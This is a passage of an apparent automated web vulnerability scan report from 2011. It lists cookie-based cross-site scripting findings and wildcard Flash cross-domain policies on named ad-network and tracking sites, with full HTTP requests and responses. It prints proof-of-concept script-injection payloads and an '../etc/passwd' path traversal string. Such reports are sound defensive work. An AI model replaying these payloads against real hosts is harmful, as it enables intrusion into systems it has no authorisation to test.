if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"348445181",Pid:"p63514475",Arc:"233006068",Location:
...[SNIP]...
00:54:33 2011&recExp=Sat Sep 17 00:54:33 2011&prad=348445181&arc=233006068&', "ar_p90175839": 'exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&6557f<script>alert(1)</script>91f47577525', "BMX_G250d16dea83662e86ace2653": 'method%2D%3E%2D1%2Cts%2D%3E1316220781%2E709%2Cwait%2D%3E10000%2C', "UID": '9cc29993-80.67.74.150-1314836282../../../../../../../../etc/passwd%009cc29993-80.67.74.
...[SNIP]...

4.252. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [ZEDOIDA cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-507/d3/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dddd7"-alert(1)-"bd70fc74773 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=collective728x90&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311dddd7"-alert(1)-"bd70fc74773; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:collective728x90,b4e04;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:951,2,0:0,2,14:951,0,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=55:53:10:10:10:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=17
Expires: Sat, 17 Sep 2011 01:50:39 GMT
Date: Sat, 17 Sep 2011 01:50:22 GMT
Content-Length: 2642
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='collective7
...[SNIP]...
ined;


                                var zzStr = "s=2;u=k5xiThcyanucBq9IXvhSGSz5~090311dddd7"-alert(1)-"bd70fc74773;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

4.253. http://livechat.iadvize.com/chat_init.js [vuid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://livechat.iadvize.com
Path:   /chat_init.js

Issue detail

The value of the vuid cookie is copied into the HTML document as plain text between tags. The payload e972f<script>alert(1)</script>5056afb88a3 was submitted in the vuid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /chat_init.js?sid=1821 HTTP/1.1
Host: livechat.iadvize.com
Proxy-Connection: keep-alive
Referer: http://www.mailjet.com/features
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c62e972f<script>alert(1)</script>5056afb88a3; 1821vvc=3; 1821_idz=XnclJ01Pg6id2FcJU13kUkMfaXVNV%2F8gxkjQn8hBPcG6LNaooz40h%2BMaW0hQlsjGSRD%2BkhBEQXtHEo8uNUWZDoUCReT5yO90BLxF%2FLlYyUr51FG%2FyyfLpChY7rUtOwVCw8l%2Fg3u5V7ZarDSzVOiKi6RLcJ2O; 1821_idzp=%7B%22site_id%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A2%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A1%2C%22connectionTime%22%3A1316210078%2C%22navTime%22%3A1000%2C%22origin_site%22%3A%22%22%2C%22origin%22%3A%22direct%22%2C%22refengine%22%3A%22%22%2C%22refkeyword%22%3A%22%22%7D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Fri, 16 Sep 2011 21:55:21 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
P3P: policyref="http://livechat.iadvize.com/w3c/p3p.xml", CP="NID DSP NON COR"
Set-Cookie: vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c62e972f%3Cscript%3Ealert%281%29%3C%2Fscript%3E5056afb88a3; expires=Sun, 15-Sep-2013 21:55:21 GMT; path=/
Set-Cookie: 1821_idzp=%7B%22origin_site%22%3A%22%22%2C%22origin%22%3A%22direct%22%2C%22refengine%22%3A%22%22%2C%22refkeyword%22%3A%22%22%2C%22site_id%22%3A1821%2C%22lang%22%3A%22en%22%2C%22pageview%22%3A14%2C%22referrer_lastPage%22%3A%22http%3A%5C%2F%5C%2Fwww.mailjet.com%5C%2Ffeatures%22%2C%22timeElapsed%22%3A21936835.35%2C%22navTime%22%3A1316210121000%7D; path=/
Expires: Mon, 22 Jan 1978 12:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 42141

if(typeof(iAdvize) !== 'object'){
   
if (/Safari/.test(navigator.userAgent) && !(/Chrome/.test(navigator.userAgent))) {
   var Sbody = document.getElementsByTagName( 'BODY' )[ 0 ];
   var newNode = docume
...[SNIP]...

       iframe.name = name;
       iframe.src = 'javascript:false';
       div.appendChild(iframe);
       form.action = 'http://livechat.iadvize.com/saveuid.php?sid=1821&vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c62e972f<script>alert(1)</script>5056afb88a3';
       form.method = 'POST';
       form.target = name;
       div.appendChild(form);
       form.submit();
   }, 10);
}

if(typeof(iAdvize2) === 'undefined'){
           iAdvize2 = {}
}

/*! LAB.js (LABjs :: Loading And Blockin
...[SNIP]...

4.254. http://s19.sitemeter.com/js/counter.asp [IP cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s19.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a098"%3balert(1)//7f633bd7759 was submitted in the IP cookie. This input was echoed as 7a098";alert(1)//7f633bd7759 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.asp?site=s19actvalue HTTP/1.1
Host: s19.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.actvalue.com/pages/asp/editorial/ps_rfid.asp?d=Tecnologia_RFId___Radio_Frequency_Identification___Tecnologia_attiva_e_passiva___Componenti_principali__trasponder__tag___antenna__middleware
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=50%2E23%2E123%2E1067a098"%3balert(1)//7f633bd7759

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 16 Sep 2011 19:46:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7290
Content-Type: application/x-javascript
Expires: Fri, 16 Sep 2011 19:56:11 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "50.23.123.1067a098";alert(1)//7f633bd7759";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

4.255. http://s19.sitemeter.com/js/counter.js [IP cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s19.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6a38"%3balert(1)//45165aecc58 was submitted in the IP cookie. This input was echoed as d6a38";alert(1)//45165aecc58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.js?site=s19actvalue HTTP/1.1
Host: s19.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.actvalue.com/pages/asp/editorial/ps_rfid.asp?d=Tecnologia_RFId___Radio_Frequency_Identification___Tecnologia_attiva_e_passiva___Componenti_principali__trasponder__tag___antenna__middleware
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=50%2E23%2E123%2E106d6a38"%3balert(1)//45165aecc58

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 16 Sep 2011 19:46:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7290
Content-Type: application/x-javascript
Expires: Fri, 16 Sep 2011 19:56:11 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "50.23.123.106d6a38";alert(1)//45165aecc58";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

4.256. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp [wsa cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.websitealive2.com
Path:   /89/visitor/vTrackerSrc_v2.asp

Issue detail

The value of the wsa cookie is copied into the HTML document as plain text between tags. The payload 9222c<script>alert(1)</script>10abcc0f8d1 was submitted in the wsa cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /89/visitor/vTrackerSrc_v2.asp?action=poll&groupid=89&websiteid=0&departmentid=0&sessionid_=30306&grouponline=Y&online_acd=&dt=IT%20On%20Command&dl=http%3A%2F%2Fwww.itoncommand.com%2FGetAQuote.aspx%3Futm_source%3Dgoogle%26utm_medium%3Dcpc%26utm_term%3DVDI%26utm_campaign%3DCampaign%2520%231%26gclid%3DCNHDra6Co6sCFUkbQgodVnkZ4Q&rf=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dvirtual%2Bdesktop%23pq%3Dvdi%26hl%3Den%26sugexp%3Dgsis%252Ci18n%253Dtrue%26cp%3D7%26gs_id%3Dw%26xhr%3Dt%26q%3Dvdi%2Bhosting%26pf%3Dp%26sclient%3Dpsy-ab%26source%3Dhp%26pbx%3D1%26oq%3Dvdi%2Bhos%26aq%3D0%26aqi%3Dg1g-v3%26aql%3D%26gs_sm%3D%26gs_upl%3D%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db659e1e8b520709%26biw%3D1087%26bih%3D870&wsa_custom_str=^^^^&random=0.6624209545552731 HTTP/1.1
Host: www.websitealive2.com
Proxy-Connection: keep-alive
Referer: http://www.itoncommand.com/GetAQuote.aspx?utm_source=google&utm_medium=cpc&utm_term=VDI&utm_campaign=Campaign%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsa=cookiedetect=True&proactiveauto%5Fenabled%5F0=N&lastwebsiteid=0&pagesvisited%5F0=19222c<script>alert(1)</script>10abcc0f8d1; ASPSESSIONIDSCQDABCS=CBNKONCBJEMLOJKGEAPJOAOJ

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Length: 155
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NOI DSP COR CURa OUR NOR"
Set-Cookie: wsa=dl%5Flast%5F0=http%3A%2F%2Fwww%2Eitoncommand%2Ecom%2FGetAQuote%2Easpx%3Futm%5Fsource%3Dgoogle%26utm%5Fmedium%3Dcpc%26utm%5Fterm%3DVDI%26utm%5Fcampaign%3DCampaign%2520%231%26gclid%3DCNHDra6Co6sCFUkbQgodVnkZ4Q&pagesvisited%5F0=19222c%3Cscript%3Ealert%281%29%3C%2Fscript%3E10abcc0f8d1&lastwebsiteid=0&proactiveauto%5Fenabled%5F0=N&cookiedetect=True; path=/89
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 00:26:41 GMT


//alert('19222c<script>alert(1)</script>10abcc0f8d1');

//alert('browsing');

//alert('proactive_lastaccept=');
               

5. Flash cross-domain policy  previous  next
There are 152 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://2912a.v.fwmrm.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://2912a.v.fwmrm.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: 2912a.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml
ETag: "2142535918"
Last-Modified: Thu, 03 Jan 2008 02:21:46 GMT
Cteonnt-Length: 302
Date: Sat, 17 Sep 2011 01:04:34 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Cache-Control: private
Content-Length: 302

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for FreeWheel Media Servers. For support contact webmaster at
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.2. http://3ps.go.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://3ps.go.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 3ps.go.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Connection: close
Date: Sat, 17 Sep 2011 01:02:37 GMT
Content-Type: text/xml
Last-Modified: Wed, 13 May 2009 23:17:02 GMT
Accept-Ranges: bytes
ETag: "dec182ec20d4c91:390"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: SRV03
Content-Length: 202

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

5.3. http://a.collective-media.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.collective-media.net

Response

HTTP/1.0 200 OK
Server: nginx/1.0.5
Content-Type: text/plain
Content-Length: 187
Last-Modified: Wed, 07 Sep 2011 14:07:41 GMT
Accept-Ranges: bytes
Date: Sat, 17 Sep 2011 01:09:42 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="true"/>
</cross-domain-policy>

5.4. http://a.tribalfusion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.5. http://a1.interclick.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a1.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 10 Aug 2011 14:57:15 GMT
Accept-Ranges: bytes
ETag: "df382cb6d57cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 17 Sep 2011 01:44:25 GMT
Xonnection: Xeep-alive
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.6. http://abc.csar.go.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.csar.go.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: abc.csar.go.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Connection: close
Date: Sat, 17 Sep 2011 01:02:15 GMT
Content-Type: text/xml
Last-Modified: Wed, 13 May 2009 23:17:02 GMT
Accept-Ranges: bytes
ETag: "dec182ec20d4c91:390"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: SRV03
Content-Length: 202

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

5.7. http://action.media6degrees.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://action.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: action.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"288-1307715244000"
Last-Modified: Fri, 10 Jun 2011 14:14:04 GMT
Content-Type: application/xml
Content-Length: 288
Date: Sat, 17 Sep 2011 01:38:53 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.8. http://ad.afy11.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:14:07 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.9. http://ad.auditude.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.auditude.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.auditude.com

Response

HTTP/1.0 200 OK
Connection: close
Expires: Sat, 24 Sep 2011 01:10:14 GMT
Cache-Control: max-age=604800
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Mon, 25 Jul 2011 17:10:02 GMT
Content-Length: 261
Date: Sat, 17 Sep 2011 01:10:14 GMT
Server: lighttpd/1.4.18

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.10. http://ad.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sat, 17 Sep 2011 00:52:00 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sat, 17 Sep 2011 00:52:00 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

5.11. http://adm.fwmrm.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adm.fwmrm.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: adm.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "46c-12e-441a499a4d0c0"
Expires: Sat, 17 Sep 2011 06:29:28 GMT
Cache-Control: max-age=21600
Last-Modified: Wed, 19 Dec 2007 14:38:35 GMT
Accept-Ranges: bytes
Cteonnt-Length: 302
